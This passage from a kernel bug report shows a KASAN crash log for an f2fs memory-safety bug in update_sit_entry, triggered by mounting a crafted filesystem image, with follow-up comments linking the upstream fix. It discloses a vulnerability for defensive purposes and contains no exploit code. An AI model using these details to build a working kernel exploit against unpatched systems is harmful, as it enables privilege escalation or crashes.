[ 1428.847596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1428.847648] The buggy address belongs to the object at ffff880194483300
                which belongs to the cache names_cache of size 4096
[ 1428.847946] The buggy address is located 576 bytes inside of
                4096-byte region [ffff880194483300, ffff880194484300)
[ 1428.848234] The buggy address belongs to the page:
[ 1428.848366] page:ffffea0006512000 count:1 mapcount:0 mapping:ffff8801f3586380 index:0x0 compound_mapcount: 0
[ 1428.848606] flags: 0x17fff8000008100(slab|head)
[ 1428.848737] raw: 017fff8000008100 dead000000000100 dead000000000200 ffff8801f3586380
[ 1428.848931] raw: 0000000000000000 0000000000070007 00000001ffffffff 0000000000000000
[ 1428.849122] page dumped because: kasan: bad access detected

[ 1428.849305] Memory state around the buggy address:
[ 1428.849436]  ffff880194483400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849620]  ffff880194483480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849804] >ffff880194483500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849985]                                            ^
[ 1428.850120]  ffff880194483580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.850303]  ffff880194483600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.850498] ==================================================================
[ 1428.850679] Disabling lock debugging due to kernel taint
[ 1428.850762] WARNING: CPU: 0 PID: 2741 at fs/f2fs/segment.c:1829 update_sit_entry+0x733/0x7f0
[ 1428.850764] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.850845] CPU: 0 PID: 2741 Comm: a.out Tainted: G    B   W         4.17.0+ #1
[ 1428.850848] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.850855] RIP: 0010:update_sit_entry+0x733/0x7f0
[ 1428.850858] Code: 43 10 e9 15 fc ff ff 48 8d 7d 10 e8 57 ab d7 ff 48 8b 5d 10 be 04 00 00 00 48 8d 7b 48 e8 d5 ae d7 ff 8b 5b 48 e9 2e fd ff ff <0f> 0b f0 80 4d 48 04 e9 af f9 ff ff 48 8d 7d 10 e8 28 ab d7 ff 4c 
[ 1428.850923] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010286
[ 1428.850932] RAX: 0000000000000200 RBX: ffff880194483540 RCX: 0000000000000000
[ 1428.850936] RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff8801939e619c
[ 1428.850940] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.850943] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000200
[ 1428.850946] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1428.850951] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.850957] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.850960] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.850965] Call Trace:
[ 1428.850975]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.850982]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.850992]  do_write_page+0xc8/0x150
[ 1428.851000]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.851007]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.851016]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.851021]  ? __mod_node_page_state+0x22/0xa0
[ 1428.851026]  ? inc_zone_page_state+0x54/0x100
[ 1428.851031]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.851042]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.851049]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.851056]  ? __get_node_page+0x335/0x6b0
[ 1428.851061]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.851072]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.851078]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.851082]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.851089]  f2fs_file_mmap+0x79/0xc0
[ 1428.851098]  mmap_region+0x58b/0x880
[ 1428.851106]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.851111]  do_mmap+0x55b/0x7a0
[ 1428.851117]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.851127]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.851134]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.851141]  ? do_sys_open+0x206/0x2a0
[ 1428.851149]  ? __fget+0xb4/0x100
[ 1428.851154]  ksys_mmap_pgoff+0x278/0x360
[ 1428.851160]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.851167]  do_syscall_64+0x73/0x160
[ 1428.851177]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.851181] RIP: 0033:0x7fb1430766ba
[ 1428.851182] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.851259] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.851264] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.851267] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.851270] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.851272] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.851275] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.851280] ---[ end trace b1cfe6aeee92e9aa ]---
[ 1428.851308] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
[ 1428.851504] PGD 80000001e9709067 P4D 80000001e9709067 PUD 1e9708067 PMD 0 
[ 1428.851685] Oops: 0000 [#1] SMP KASAN PTI
[ 1428.851801] CPU: 0 PID: 2741 Comm: a.out Tainted: G    B   W         4.17.0+ #1
[ 1428.851985] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.852219] RIP: 0010:update_sit_entry+0x558/0x7f0
[ 1428.852347] Code: f7 d1 41 c1 ec 03 83 e1 07 4c 89 e2 48 03 53 08 d3 e0 89 04 24 48 89 d7 48 89 54 24 08 e8 90 aa d7 ff 48 8b 54 24 08 8b 34 24 <0f> be 02 89 f1 f7 d1 88 4c 24 27 21 c1 85 c6 88 0a 0f 84 3b 02 00 
[ 1428.852844] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010296
[ 1428.852985] RAX: 0000000000000000 RBX: ffff880194483540 RCX: ffffffffa45ffd10
[ 1428.853166] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000000000000
[ 1428.853347] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.853527] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000000
[ 1428.853705] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1428.858992] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.864070] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.869137] CR2: 0000000000000000 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.874143] Call Trace:
[ 1428.879196]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.884380]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.889439]  do_write_page+0xc8/0x150
[ 1428.894426]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.899415]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.904357]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.909349]  ? __mod_node_page_state+0x22/0xa0
[ 1428.914342]  ? inc_zone_page_state+0x54/0x100
[ 1428.919362]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.924423]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.929515]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.934585]  ? __get_node_page+0x335/0x6b0
[ 1428.939590]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.944587]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.949563]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.954509]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.959309]  f2fs_file_mmap+0x79/0xc0
[ 1428.963989]  mmap_region+0x58b/0x880
[ 1428.968590]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.973192]  do_mmap+0x55b/0x7a0
[ 1428.977709]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.982194]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.986714]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.991250]  ? do_sys_open+0x206/0x2a0
[ 1428.995825]  ? __fget+0xb4/0x100
[ 1429.000417]  ksys_mmap_pgoff+0x278/0x360
[ 1429.004978]  ? find_mergeable_anon_vma+0x50/0x50
[ 1429.009515]  do_syscall_64+0x73/0x160
[ 1429.014093]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1429.018665] RIP: 0033:0x7fb1430766ba
[ 1429.023134] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1429.032575] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1429.037321] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1429.042152] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1429.046761] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1429.051199] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1429.055478] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1429.059647] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1429.087581] CR2: 0000000000000000
[ 1429.092517] ---[ end trace b1cfe6aeee92e9ab ]---
[ 1429.097355] RIP: 0010:update_sit_entry+0x558/0x7f0
[ 1429.102137] Code: f7 d1 41 c1 ec 03 83 e1 07 4c 89 e2 48 03 53 08 d3 e0 89 04 24 48 89 d7 48 89 54 24 08 e8 90 aa d7 ff 48 8b 54 24 08 8b 34 24 <0f> be 02 89 f1 f7 d1 88 4c 24 27 21 c1 85 c6 88 0a 0f 84 3b 02 00 
[ 1429.112277] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010296
[ 1429.117385] RAX: 0000000000000000 RBX: ffff880194483540 RCX: ffffffffa45ffd10
[ 1429.122588] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000000000000
[ 1429.127790] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1429.133010] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000000
[ 1429.138374] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1429.143834] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1429.149154] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1429.154467] CR2: 0000000000000000 CR3: 00000001ec9d4000 CR4: 00000000000006f0

Comment 2 Wen Xu 2018-06-29 15:46:47 UTC

(In reply to Wen Xu from comment #1)

> # mount -t f2fs final.img

mount -t f2fs final.img mnt

Comment 3 Wen Xu 2018-07-09 18:27:44 UTC

Fixed by:

https://sourceforge.net/p/linux-f2fs/mailman/message/36356878/

Comment 4 Chao Yu 2018-08-26 00:40:22 UTC

Updated commit link:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4dbe38dc386910c668c75ae616b99b823b59f3eb